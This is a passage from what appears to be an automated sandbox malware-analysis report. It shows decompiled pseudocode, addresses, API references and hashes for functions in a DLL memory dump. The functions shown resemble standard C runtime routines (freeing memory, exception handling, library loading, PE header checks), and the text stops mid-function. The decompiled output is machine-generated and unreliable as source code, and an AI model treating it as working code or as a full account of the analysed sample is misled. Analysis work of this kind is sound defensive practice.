0x6ee47578
0x6ee47578
0x6ee4757b
0x6ee47586
0x00000000
0x00000000
0x00000000
0x00000000
0x6ee47586
0x6ee47576
0x6ee47595
0x6ee47597
0x6ee475a0
0x6ee475a6
0x6ee475a9
0x6ee475a9
0x6ee475ac
0x6ee475af
0x6ee475af
0x6ee475bf
0x6ee475cd
0x6ee475d2
0x6ee475d9
0x6ee475db
0x00000000
0x6ee475e1
0x6ee475e7
0x6ee475f4
0x6ee475fd
0x6ee47603
0x6ee47610
0x6ee47617
0x6ee4761c
0x6ee4761f
0x6ee47621
0x6ee4785f
0x6ee47865
0x6ee47866
0x6ee47867
0x6ee47868
0x6ee47869
0x6ee4786a
0x6ee4786f
0x6ee47872
0x6ee47875
0x6ee47876
0x6ee47888
0x6ee4788d
0x6ee4788f
0x6ee47898
0x6ee47898
0x6ee47891
0x6ee47891
0x6ee47894
0x6ee47896
0x00000000
0x00000000
0x6ee47896
0x6ee4789e
0x6ee47627
0x6ee47627
0x6ee47635
0x6ee47638
0x6ee4764e
0x6ee47655
0x6ee4765a
0x6ee4763a
0x6ee4763a
0x6ee47642
0x00000000
0x6ee47644
0x6ee47644
0x6ee4764a
0x6ee4764a
0x6ee47642
0x6ee47661
0x6ee47668
0x6ee4766b
0x6ee47769
0x6ee4776c
0x6ee47779
0x6ee4777c
0x6ee47784
0x6ee47784
0x6ee4776e
0x6ee47774
0x6ee47774
0x6ee47671
0x6ee47671
0x6ee4767d
0x6ee47683
0x6ee47689
0x6ee4768c
0x6ee47692
0x6ee47695
0x6ee47698
0x00000000
0x00000000
0x6ee4769a
0x6ee476a3
0x6ee476a7
0x6ee476b0
0x6ee476b4
0x6ee476b5
0x6ee476bb
0x6ee476c1
0x6ee476c7
0x6ee476ca
0x00000000
0x00000000
0x6ee476cc
0x6ee476eb
0x6ee476eb
0x6ee476ee
0x6ee4770b
0x6ee47710
0x6ee47713
0x6ee47715
0x6ee47753
0x6ee47717
0x6ee47717
0x6ee4771d
0x6ee47722
0x6ee4772a
0x6ee4772b
0x6ee4772b
0x6ee47742
0x6ee47749
0x6ee4774c
0x6ee4774e
0x6ee4774e
0x6ee47759
0x6ee4775f
0x6ee4775f
0x6ee47764
0x00000000
0x6ee47764
0x6ee476ce
0x6ee476d0
0x6ee476d5
0x6ee476db
0x6ee476e4
0x6ee476e7
0x6ee476e7
0x00000000
0x6ee476d0
0x6ee47787
0x6ee47787
0x6ee4778b
0x6ee47793
0x6ee47799
0x6ee4779c
0x6ee477a2
0x6ee477a4
0x6ee477f0
0x6ee477f6
0x6ee477fd
0x6ee477fd
0x6ee47803
0x6ee47807
0x00000000
0x6ee47809
0x6ee4780d
0x6ee47816
0x6ee47822
0x6ee47830
0x6ee47836
0x6ee47839
0x6ee47839
0x6ee47807
0x6ee47848
0x6ee47850
0x6ee47859
0x6ee477a6
0x6ee477ac
0x6ee477b6
0x6ee477c8
0x6ee477cf
0x6ee477dc
0x00000000
0x6ee477dc
0x00000000
0x6ee477a4
0x6ee47621
0x6ee47599
0x6ee477e1
0x6ee477ef
0x6ee477ef
0x00000000
0x6ee47597
0x6ee47590
0x6ee47592
0x6ee47592
0x00000000
0x6ee47592
0x00000000

APIs

Part of subcall function 6EE444CA: GetLastError.KERNEL32(?,?,?,6EE3ACF2,6EDB2A9E,?,?,?,?,?,6EDB2A5D,?,?,?,6EDB28E8,?), ref: 6EE444CF
Part of subcall function 6EE444CA: SetLastError.KERNEL32(00000000,00000007,000000FF,?,?,?,6EE3ACF2,6EDB2A9E,?,?,?,?,?,6EDB2A5D,?,?), ref: 6EE4456D

_free.LIBCMT ref: 6EE477B6
_free.LIBCMT ref: 6EE477CF
_free.LIBCMT ref: 6EE4780D
_free.LIBCMT ref: 6EE47816
_free.LIBCMT ref: 6EE47822

Strings

|n, xrefs: 6EE477F0
C, xrefs: 6EE47627

Memory Dump Source

Source File: 00000002.00000002.307164874.000000006EDB1000.00000020.00020000.sdmp, Offset: 6EDB0000, based on PE: true

Associated: 00000002.00000002.307150412.000000006EDB0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.307398913.000000006EE57000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.307461252.000000006EE6A000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.307487147.000000006EE77000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.307516159.000000006EE7A000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorLast
String ID: C$|n
API String ID: 3291180501-3839784562
Opcode ID: 27fc4b08357d4c747ca22736fd7b59b0060636cd627fc429e055f5b1e65f7055
Instruction ID: 08a8289ed5c331328b6fb4cdc21aa51faf5f8c239212033aa999023ffd60e5ed
Opcode Fuzzy Hash: 27fc4b08357d4c747ca22736fd7b59b0060636cd627fc429e055f5b1e65f7055
Instruction Fuzzy Hash: 50B16E75A1161ADFDB24CF58D888B99B7B5FF48304F6045AED809A7390E730AE90CF80

Uniqueness

Uniqueness Score: -1.00%

Function 6EDB2C50, Relevance: 12.1, APIs: 8, Instructions: 86
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E6EDB2C50(intOrPtr* __ecx, void* __eflags, signed short* _a4) {
				char _v8;
				intOrPtr _v16;
				intOrPtr* _v20;
				signed short* _v24;
				intOrPtr* _v28;
				char _v52;
				char _v76;
				intOrPtr _t86;
				intOrPtr _t88;

				_push(0xffffffff);
				_push(E6EE560D5);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t88;
				_v20 = __ecx;
				 *_v20 = _a4;
				 *((intOrPtr*)(_v20 + 4)) = 0;
				E6EDB18A0( &_v76, __eflags, 0x6ee57298);
				_v8 = 0;
				E6EDB12B0(__eflags,  &_v52,  &_v76, 0x6ee5729c);
				_v8 = 1;
				_v24 = _a4;
				if(( *_v24 & 0x0000ffff) == 0x5a4d) {
					_t20 =  &(_v24[0x1e]); // 0x7f90b890
					_v28 = _v24 +  *_t20;
					__eflags =  *_v28 - 0x4550;
					if( *_v28 == 0x4550) {
						_t86 = _v28;
						__eflags = ( *(_t86 + 0x18) & 0x0000ffff) - 0x10b;
						if(( *(_t86 + 0x18) & 0x0000ffff) == 0x10b) {
							E6EDB30F0( &_v52);
							_push(E6EDB2660( &_v52));
							E6EDB1340(_t54);
							 *((intOrPtr*)(_v20 + 4)) = _v28;
							_v8 = 0;
							E6EDB1D80( &_v52);
							_v8 = 0xffffffff;
							E6EDB1D80( &_v76);
						} else {
							_v8 = 0;
							E6EDB1D80( &_v52);
							_v8 = 0xffffffff;
							E6EDB1D80( &_v76);
						}
					} else {
						_v8 = 0;
						E6EDB1D80( &_v52);
						_v8 = 0xffffffff;
						E6EDB1D80( &_v76);
					}
				} else {
					_v8 = 0;
					E6EDB1D80( &_v52);
					_v8 = 0xffffffff;
					E6EDB1D80( &_v76);
				}
				 *[fs:0x0] = _v16;
				return _v20;
			}

0x6edb2c53
0x6edb2c55
0x6edb2c60
0x6edb2c61
0x6edb2c6b
0x6edb2c74
0x6edb2c79
0x6edb2c88
0x6edb2c8d
0x6edb2ca1
0x6edb2ca9
0x6edb2cb0
0x6edb2cbf
0x6edb2ce7
0x6edb2cea
0x6edb2cf0
0x6edb2cf6
0x6edb2d15
0x6edb2d1c
0x6edb2d21
0x6edb2d43
0x6edb2d50
0x6edb2d51
0x6edb2d5f
0x6edb2d62
0x6edb2d69
0x6edb2d6e
0x6edb2d78
0x6edb2d23
0x6edb2d23
0x6edb2d2a
0x6edb2d2f
0x6edb2d39
0x6edb2d39
0x6edb2cf8
0x6edb2cf8
0x6edb2cff
0x6edb2d04
0x6edb2d0e
0x6edb2d0e
0x6edb2cc1
0x6edb2cc1
0x6edb2cc8
0x6edb2ccd
0x6edb2cd7
0x6edb2cd7
0x6edb2d83
0x6edb2d8d

APIs

task.LIBCPMTD ref: 6EDB2CC8
task.LIBCPMTD ref: 6EDB2CD7
task.LIBCPMTD ref: 6EDB2CFF
task.LIBCPMTD ref: 6EDB2D0E

Memory Dump Source

Source File: 00000002.00000002.307164874.000000006EDB1000.00000020.00020000.sdmp, Offset: 6EDB0000, based on PE: true

Associated: 00000002.00000002.307150412.000000006EDB0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.307398913.000000006EE57000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.307461252.000000006EE6A000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.307487147.000000006EE77000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.307516159.000000006EE7A000.00000002.00020000.sdmp Download File

Similarity

API ID: task
String ID:
API String ID: 1384045349-0
Opcode ID: d962a00d71072de579484de36d5f6dbd97910bbdbcab3c965cc41ca33b63a682
Instruction ID: 9fa7db0603c09f4350f159c8b644cba06b87ff01c2bdde0f440c199bf15be645
Opcode Fuzzy Hash: d962a00d71072de579484de36d5f6dbd97910bbdbcab3c965cc41ca33b63a682
Instruction Fuzzy Hash: 194128B4C21209DBCB04DFD4C990BEEBBB4BF14314F244A58E452673D0EB346A4ACBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6EE39240, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120
COMMON

Download Yara Rule

C-Code - Quality: 46%

			E6EE39240(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags, void* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v5;
				signed int _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _t52;
				signed int _t59;
				intOrPtr _t60;
				void* _t61;
				intOrPtr* _t62;
				intOrPtr _t64;
				intOrPtr _t67;
				intOrPtr _t72;
				intOrPtr* _t76;
				intOrPtr _t77;
				intOrPtr _t79;
				signed int _t82;
				char _t84;
				intOrPtr _t87;
				intOrPtr _t96;
				intOrPtr _t99;
				intOrPtr* _t101;
				void* _t105;
				void* _t107;
				void* _t115;

				_t76 = _a4;
				_v5 = 0;
				_v16 = 1;
				 *_t76 = E6EE55F92(__ecx,  *_t76);
				_t77 = _a8;
				_t6 = _t77 + 0x10; // 0x11
				_t99 = _t6;
				_v20 = _t99;
				_v12 =  *(_t77 + 8) ^  *0x6ee77a68;
				E6EE39200( *(_t77 + 8) ^  *0x6ee77a68, _t99, __edi, __esi);
				E6EE3A34C(_a12);
				_t52 = _a4;
				_t107 = _t105 - 0x1c + 0x10;
				_t96 =  *((intOrPtr*)(_t77 + 0xc));
				if(( *(_t52 + 4) & 0x00000066) != 0) {
					__eflags = _t96 - 0xfffffffe;
					if(_t96 != 0xfffffffe) {
						E6EE3A4D0(_t77, 0xfffffffe, _t99, 0x6ee77a68);
						goto L13;
					}
					goto L14;
				} else {
					_v32 = _t52;
					_v28 = _a12;
					 *((intOrPtr*)(_t77 - 4)) =  &_v32;
					if(_t96 == 0xfffffffe) {
						L14:
						return _v16;
					} else {
						do {
							_t82 = _v12;
							_t59 = _t96 + (_t96 + 2) * 2;
							_t79 =  *((intOrPtr*)(_t82 + _t59 * 4));
							_t60 = _t82 + _t59 * 4;
							_t83 =  *((intOrPtr*)(_t60 + 4));
							_v24 = _t60;
							if( *((intOrPtr*)(_t60 + 4)) == 0) {
								_t84 = _v5;
								goto L7;
							} else {
								_t61 = E6EE3A470(_t83, _t99);
								_t84 = 1;
								_v5 = 1;
								_t115 = _t61;
								if(_t115 < 0) {
									_v16 = 0;
									L13:
									_push(_t99);
									_push(_v12);
									E6EE39200();
									goto L14;
								} else {
									if(_t115 > 0) {
										_t62 = _a4;
										__eflags =  *_t62 - 0xe06d7363;
										if( *_t62 == 0xe06d7363) {
											__eflags =  *0x6ee5c7f0;
											if(__eflags != 0) {
												_t72 = E6EE559E0(__eflags, 0x6ee5c7f0);
												_t107 = _t107 + 4;
												__eflags = _t72;
												if(_t72 != 0) {
													_t101 =  *0x6ee5c7f0; // 0x6ee39050
													 *0x6ee5714c(_a4, 1);
													 *_t101();
													_t99 = _v20;
													_t107 = _t107 + 8;
												}
												_t62 = _a4;
											}
										}
										E6EE3A4B0(_t62, _a8, _t62);
										_t64 = _a8;
										__eflags =  *((intOrPtr*)(_t64 + 0xc)) - _t96;
										if( *((intOrPtr*)(_t64 + 0xc)) != _t96) {
											E6EE3A4D0(_t64, _t96, _t99, 0x6ee77a68);
											_t64 = _a8;
										}
										_push(_t99);
										_push(_v12);
										 *((intOrPtr*)(_t64 + 0xc)) = _t79;
										E6EE39200();
										_t87 =  *((intOrPtr*)(_v24 + 8));
										E6EE3A490();
										asm("int3");
										__eflags = E6EE3A4E7();
										if(__eflags != 0) {
											_t67 = E6EE3957A(_t87, __eflags);
											__eflags = _t67;
											if(_t67 != 0) {
												return 1;
											} else {
												E6EE3A523();
												goto L24;
											}
										} else {
											L24:
											__eflags = 0;
											return 0;
										}
									} else {
										goto L7;
									}
								}
							}
							goto L28;
							L7:
							_t96 = _t79;
						} while (_t79 != 0xfffffffe);
						if(_t84 != 0) {
							goto L13;
						}
						goto L14;
					}
				}
				L28:
			}

0x6ee39247
0x6ee3924c
0x6ee39252
0x6ee3925e
0x6ee39260
0x6ee39266
0x6ee39266
0x6ee39271
0x6ee39274
0x6ee39277
0x6ee3927f
0x6ee39284
0x6ee39287
0x6ee3928a
0x6ee39291
0x6ee392ed
0x6ee392f0
0x6ee392ff
0x00000000
0x6ee392ff
0x00000000
0x6ee39293
0x6ee39293
0x6ee39299
0x6ee3929f
0x6ee392a5
0x6ee39310
0x6ee39319
0x6ee392a7
0x6ee392a7
0x6ee392a7
0x6ee392ad
0x6ee392b0
0x6ee392b3
0x6ee392b6
0x6ee392b9
0x6ee392be
0x6ee392d4
0x00000000
0x6ee392c0
0x6ee392c2
0x6ee392c7
0x6ee392c9
0x6ee392cc
0x6ee392ce
0x6ee392e4
0x6ee39304
0x6ee39304
0x6ee39305
0x6ee39308
0x00000000
0x6ee392d0
0x6ee392d0
0x6ee3931a
0x6ee3931d
0x6ee39323
0x6ee39325
0x6ee3932c
0x6ee39333
0x6ee39338
0x6ee3933b
0x6ee3933d
0x6ee3933f
0x6ee3934c
0x6ee39352
0x6ee39354
0x6ee39357
0x6ee39357
0x6ee3935a
0x6ee3935a
0x6ee3932c
0x6ee39362
0x6ee39367
0x6ee3936a
0x6ee3936d
0x6ee39379
0x6ee3937e
0x6ee3937e
0x6ee39381
0x6ee39382
0x6ee39385
0x6ee39388
0x6ee39395
0x6ee39398
0x6ee3939d
0x6ee393a3
0x6ee393a5
0x6ee393aa
0x6ee393af
0x6ee393b1
0x6ee393bc
0x6ee393b3
0x6ee393b3
0x00000000
0x6ee393b3
0x6ee393a7
0x6ee393a7
0x6ee393a7
0x6ee393a9
0x6ee393a9
0x6ee392d2
0x00000000
0x6ee392d2
0x6ee392d0
0x6ee392ce
0x00000000
0x6ee392d7
0x6ee392d7
0x6ee392d9
0x6ee392e0
0x00000000
0x6ee392e2
0x00000000
0x6ee392e0
0x6ee392a5
0x00000000

APIs

_ValidateLocalCookies.LIBCMT ref: 6EE39277
___except_validate_context_record.LIBVCRUNTIME ref: 6EE3927F
_ValidateLocalCookies.LIBCMT ref: 6EE39308
__IsNonwritableInCurrentImage.LIBCMT ref: 6EE39333
_ValidateLocalCookies.LIBCMT ref: 6EE39388

Strings

csm, xrefs: 6EE3931D

Memory Dump Source

Source File: 00000002.00000002.307164874.000000006EDB1000.00000020.00020000.sdmp, Offset: 6EDB0000, based on PE: true

Associated: 00000002.00000002.307150412.000000006EDB0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.307398913.000000006EE57000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.307461252.000000006EE6A000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.307487147.000000006EE77000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.307516159.000000006EE7A000.00000002.00020000.sdmp Download File

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 67b06e27a8fc7a42ba569090c62e3ebf10772a5e0ceafb804c11029df138473e
Instruction ID: 33425d133a8d2574ac503c2275719d70651828239da6da945bcc7ecf91139bcd
Opcode Fuzzy Hash: 67b06e27a8fc7a42ba569090c62e3ebf10772a5e0ceafb804c11029df138473e
Instruction Fuzzy Hash: 4741A970910629DFCF10CFE9C884ADEBBB5EF45318F308559E8289B395DB329A55CB90

Uniqueness

Uniqueness Score: -1.00%

Function 6EE44A0B, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6EE44A0B(void* __ecx, signed int* _a4, intOrPtr _a8) {
				signed int* _v8;
				void** _t12;
				void* _t16;
				void* _t18;
				signed int _t22;
				WCHAR* _t23;
				void** _t26;
				signed int* _t29;
				void* _t32;
				void* _t34;

				_t29 = _a4;
				while(_t29 != _a8) {
					_t22 =  *_t29;
					_t12 = 0x6ee79288 + _t22 * 4;
					_t32 =  *_t12;
					_v8 = _t12;
					if(_t32 == 0) {
						_t23 =  *(0x6ee5f070 + _t22 * 4);
						_t32 = LoadLibraryExW(_t23, 0, 0x800);
						if(_t32 != 0) {
							L12:
							_t26 = _v8;
							 *_t26 = _t32;
							if( *_t26 != 0) {
								FreeLibrary(_t32);
							}
							L14:
							if(_t32 != 0) {
								_t16 = _t32;
								L18:
								return _t16;
							}
							L15:
							_t29 =  &(_t29[1]);
							continue;
						}
						_t18 = GetLastError();
						if(_t18 != 0x57) {
							L9:
							_t32 = 0;
							L10:
							if(_t32 != 0) {
								goto L12;
							}
							 *_v8 = _t18 | 0xffffffff;
							goto L15;
						}
						_t18 = E6EE44055(_t23, L"api-ms-", 7);
						_t34 = _t34 + 0xc;
						if(_t18 == 0) {
							goto L9;
						}
						_t18 = E6EE44055(_t23, L"ext-ms-", 7);
						_t34 = _t34 + 0xc;
						if(_t18 == 0) {
							goto L9;
						}
						_t18 = LoadLibraryExW(_t23, _t32, _t32);
						_t32 = _t18;
						goto L10;
					}
					if(_t32 == 0xffffffff) {
						goto L15;
					}
					goto L14;
				}
				_t16 = 0;
				goto L18;
			}

0x6ee44a14
0x6ee44abe
0x6ee44a1c
0x6ee44a1e
0x6ee44a25
0x6ee44a27
0x6ee44a2d
0x6ee44a3a
0x6ee44a4f
0x6ee44a53
0x6ee44aa5
0x6ee44aa5
0x6ee44aaa
0x6ee44aae
0x6ee44ab1
0x6ee44ab1
0x6ee44ab7
0x6ee44ab9
0x6ee44ace
0x6ee44ac9
0x6ee44acd
0x6ee44acd
0x6ee44abb
0x6ee44abb
0x00000000
0x6ee44abb
0x6ee44a55
0x6ee44a5e
0x6ee44a95
0x6ee44a95
0x6ee44a97
0x6ee44a99
0x00000000
0x00000000
0x6ee44aa1
0x00000000
0x6ee44aa1
0x6ee44a68
0x6ee44a6d
0x6ee44a72
0x00000000
0x00000000
0x6ee44a7c
0x6ee44a81
0x6ee44a86
0x00000000
0x00000000
0x6ee44a8b
0x6ee44a91
0x00000000
0x6ee44a91
0x6ee44a32
0x00000000
0x00000000
0x00000000
0x6ee44a38
0x6ee44ac7
0x00000000

Strings

ext-ms-, xrefs: 6EE44A76
api-ms-, xrefs: 6EE44A62

Memory Dump Source

Source File: 00000002.00000002.307164874.000000006EDB1000.00000020.00020000.sdmp, Offset: 6EDB0000, based on PE: true

Associated: 00000002.00000002.307150412.000000006EDB0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.307398913.000000006EE57000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.307461252.000000006EE6A000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.307487147.000000006EE77000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.307516159.000000006EE7A000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: api-ms-$ext-ms-
API String ID: 0-537541572
Opcode ID: 0f13035cd3e0ca15026d629a99544f7094ad12bbef3cd6d5097574b2192e6f37
Instruction ID: 70bf71916605d21761c13a220688812e19d3c527a5d6606c079b934c21247754
Opcode Fuzzy Hash: 0f13035cd3e0ca15026d629a99544f7094ad12bbef3cd6d5097574b2192e6f37
Instruction Fuzzy Hash: 4C210532B11632EBDB518EE9AC40A0A37E89F027A4F350512ED15AB3C4F730ED02D5E4

Uniqueness

Uniqueness Score: -1.00%

Function 6EDEEFC0, Relevance: 10.6, APIs: 7, Instructions: 73COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.307164874.000000006EDB1000.00000020.00020000.sdmp, Offset: 6EDB0000, based on PE: true

Associated: 00000002.00000002.307150412.000000006EDB0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.307398913.000000006EE57000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.307461252.000000006EE6A000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.307487147.000000006EE77000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.307516159.000000006EE7A000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bc1f836cfc962e0e53fb91029044a71e22e42f0a31aae05012046ff067863bd4
Instruction ID: 3b0a33d1668d2f52997f2f4b2d81dee3134ec2d78f2ab68dcb6a5ec78b9c9ae1
Opcode Fuzzy Hash: bc1f836cfc962e0e53fb91029044a71e22e42f0a31aae05012046ff067863bd4
Instruction Fuzzy Hash: 532116B6910608FFCB54DFE4D84CFAEBB78AB49305F208999FA0197244DB359A44CB60

Uniqueness

Uniqueness Score: -1.00%

Function 6EE514D5, Relevance: 10.6, APIs: 7, Instructions: 65
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6EE514D5(intOrPtr _a4) {
				void* _t18;

				_t45 = _a4;
				if(_a4 != 0) {
					E6EE51221(_t45, 7);
					E6EE51221(_t45 + 0x1c, 7);
					E6EE51221(_t45 + 0x38, 0xc);
					E6EE51221(_t45 + 0x68, 0xc);
					E6EE51221(_t45 + 0x98, 2);
					E6EE4471C( *((intOrPtr*)(_t45 + 0xa0)));
					E6EE4471C( *((intOrPtr*)(_t45 + 0xa4)));
					E6EE4471C( *((intOrPtr*)(_t45 + 0xa8)));
					E6EE51221(_t45 + 0xb4, 7);
					E6EE51221(_t45 + 0xd0, 7);
					E6EE51221(_t45 + 0xec, 0xc);
					E6EE51221(_t45 + 0x11c, 0xc);
					E6EE51221(_t45 + 0x14c, 2);
					E6EE4471C( *((intOrPtr*)(_t45 + 0x154)));
					E6EE4471C( *((intOrPtr*)(_t45 + 0x158)));
					E6EE4471C( *((intOrPtr*)(_t45 + 0x15c)));
					return E6EE4471C( *((intOrPtr*)(_t45 + 0x160)));
				}
				return _t18;
			}

0x6ee514db
0x6ee514e0
0x6ee514e9
0x6ee514f4
0x6ee514ff
0x6ee5150a
0x6ee51518
0x6ee51523
0x6ee5152e
0x6ee51539
0x6ee51547
0x6ee51555
0x6ee51566
0x6ee51574
0x6ee51582
0x6ee5158d
0x6ee51598
0x6ee515a3
0x00000000
0x6ee515b3
0x6ee515b8

APIs

Part of subcall function 6EE51221: _free.LIBCMT ref: 6EE51246

_free.LIBCMT ref: 6EE51523

Part of subcall function 6EE4471C: RtlFreeHeap.NTDLL(00000000,00000000,?,6EE5124B,?,00000000,?,?,?,6EE514EE,?,00000007,?,?,6EE4EB20,?), ref: 6EE44732
Part of subcall function 6EE4471C: GetLastError.KERNEL32(?,?,6EE5124B,?,00000000,?,?,?,6EE514EE,?,00000007,?,?,6EE4EB20,?,?), ref: 6EE44744

_free.LIBCMT ref: 6EE5152E
_free.LIBCMT ref: 6EE51539
_free.LIBCMT ref: 6EE5158D
_free.LIBCMT ref: 6EE51598
_free.LIBCMT ref: 6EE515A3
_free.LIBCMT ref: 6EE515AE

Memory Dump Source

Source File: 00000002.00000002.307164874.000000006EDB1000.00000020.00020000.sdmp, Offset: 6EDB0000, based on PE: true

Associated: 00000002.00000002.307150412.000000006EDB0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.307398913.000000006EE57000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.307461252.000000006EE6A000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.307487147.000000006EE77000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.307516159.000000006EE7A000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 851172afdbfda7c5b33af3e26ae0dd2e6a5cf916cb08f35f6880e5c7f6930ac4
Instruction ID: 6a370a91683d7c1870bc5ccd28b1c82909fcca8df08dbcfb3ba1eb43d0e1ad15
Opcode Fuzzy Hash: 851172afdbfda7c5b33af3e26ae0dd2e6a5cf916cb08f35f6880e5c7f6930ac4
Instruction Fuzzy Hash: 24119D71600F04EED620AFF1EC49FCF7B9C9F01304F500C2DA2A9A6351DB26B6299642

Uniqueness

Uniqueness Score: -1.00%

Function 6EE4A208, Relevance: 9.3, APIs: 6, Instructions: 317
fileCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E6EE4A208(void* __ebx, void* __edi, void* __esi, void* __eflags, void* __fp0, void* _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
				signed int _v8;
				char _v16;
				char _v23;
				char _v24;
				void _v32;
				signed int _v33;
				long _v40;
				signed int _v44;
				intOrPtr _v48;
				char _v51;
				void _v52;
				long _v56;
				char _v60;
				intOrPtr _v68;
				char _v72;
				struct _OVERLAPPED* _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				long _v92;
				intOrPtr _v96;
				long _v100;
				signed char* _v104;
				signed char* _v108;
				void* _v112;
				intOrPtr _v116;
				char _v120;
				int _v124;
				intOrPtr _v128;
				struct _OVERLAPPED* _v132;
				struct _OVERLAPPED* _v136;
				struct _OVERLAPPED* _v140;
				struct _OVERLAPPED* _v144;
				signed int _t170;
				signed int _t172;
				int _t178;
				intOrPtr _t183;
				intOrPtr _t186;
				void* _t188;
				void* _t190;
				long _t193;
				void _t198;
				signed char* _t202;
				void* _t206;
				struct _OVERLAPPED* _t211;
				void* _t220;
				long _t224;
				intOrPtr _t225;
				char _t227;
				void* _t237;
				struct _OVERLAPPED* _t242;
				signed int _t245;
				intOrPtr _t248;
				signed int _t251;
				signed int _t252;
				signed int _t254;
				intOrPtr _t256;
				void* _t262;
				intOrPtr _t263;
				signed int _t264;
				signed int _t267;
				signed char _t268;
				intOrPtr _t271;
				signed int _t273;
				long _t274;
				signed int _t275;
				signed char* _t278;
				signed int _t282;
				signed int _t284;
				signed int _t289;
				signed int _t290;
				intOrPtr _t291;
				signed int _t292;
				struct _OVERLAPPED* _t294;
				struct _OVERLAPPED* _t296;
				signed int _t298;
				signed int _t300;
				void* _t301;
				void* _t303;

				_t326 = __fp0;
				_t298 = _t300;
				_t301 = _t300 - 0x8c;
				_t170 =  *0x6ee77a68; // 0xbfafeb97
				_v8 = _t170 ^ _t298;
				_t172 = _a8;
				_t267 = _t172 >> 6;
				_t245 = (_t172 & 0x0000003f) * 0x38;
				_t278 = _a12;
				_v108 = _t278;
				_v80 = _t267;
				_v112 =  *((intOrPtr*)(_t245 +  *((intOrPtr*)(0x6ee79368 + _t267 * 4)) + 0x18));
				_v44 = _t245;
				_v96 = _a16 + _t278;
				_t178 = GetConsoleOutputCP();
				_t242 = 0;
				_v124 = _t178;
				E6EE3B82D( &_v72, _t267, __fp0, 0);
				_t284 = 0;
				_v92 = 0;
				_v88 = 0;
				_v84 = 0;
				_t248 =  *((intOrPtr*)(_v68 + 8));
				_v128 = _t248;
				_v104 = _t278;
				if(_t278 >= _v96) {
					L49:
					__eflags = _v60 - _t242;
				} else {
					while(1) {
						_t251 = _v44;
						_v51 =  *_t278;
						_v76 = _t242;
						_v40 = 1;
						_t186 =  *((intOrPtr*)(0x6ee79368 + _v80 * 4));
						_v48 = _t186;
						if(_t248 != 0xfde9) {
							goto L20;
						}
						_t211 = _t242;
						_t271 = _v48 + 0x2e + _t251;
						_v116 = _t271;
						while( *((intOrPtr*)(_t271 + _t211)) != _t242) {
							_t211 =  &(_t211->Internal);
							if(_t211 < 5) {
								continue;
							}
							break;
						}
						_t273 = _v96 - _t278;
						_v40 = _t211;
						if(_t211 <= 0) {
							_t72 = ( *_t278 & 0x000000ff) + 0x6ee77cf0; // 0x0
							_t256 =  *_t72 + 1;
							_v48 = _t256;
							__eflags = _t256 - _t273;
							if(_t256 > _t273) {
								__eflags = _t273;
								if(_t273 <= 0) {
									goto L41;
								} else {
									_t290 = _v44;
									do {
										 *((char*)( *((intOrPtr*)(0x6ee79368 + _v80 * 4)) + _t290 + _t242 + 0x2e)) =  *((intOrPtr*)(_t242 + _t278));
										_t242 =  &(_t242->Internal);
										__eflags = _t242 - _t273;
									} while (_t242 < _t273);
									goto L40;
								}
							} else {
								_v144 = _t242;
								__eflags = _t256 - 4;
								_v140 = _t242;
								_v56 = _t278;
								_v40 = (_t256 == 4) + 1;
								_t220 = E6EE4F273( &_v144,  &_v76,  &_v56, (_t256 == 4) + 1,  &_v144);
								_t303 = _t301 + 0x10;
								__eflags = _t220 - 0xffffffff;
								if(_t220 == 0xffffffff) {
									goto L49;
								} else {
									_t291 = _v48;
									goto L19;
								}
							}
						} else {
							_t224 =  *((char*)(( *(_t251 + _v48 + 0x2e) & 0x000000ff) + 0x6ee77cf0)) + 1;
							_v56 = _t224;
							_t225 = _t224 - _v40;
							_v48 = _t225;
							if(_t225 > _t273) {
								__eflags = _t273;
								if(_t273 > 0) {
									_t292 = _t251;
									do {
										_t227 =  *((intOrPtr*)(_t242 + _t278));
										_t262 =  *((intOrPtr*)(0x6ee79368 + _v80 * 4)) + _t292 + _t242;
										_t242 =  &(_t242->Internal);
										 *((char*)(_t262 + _v40 + 0x2e)) = _t227;
										_t292 = _v44;
										__eflags = _t242 - _t273;
									} while (_t242 < _t273);
									L40:
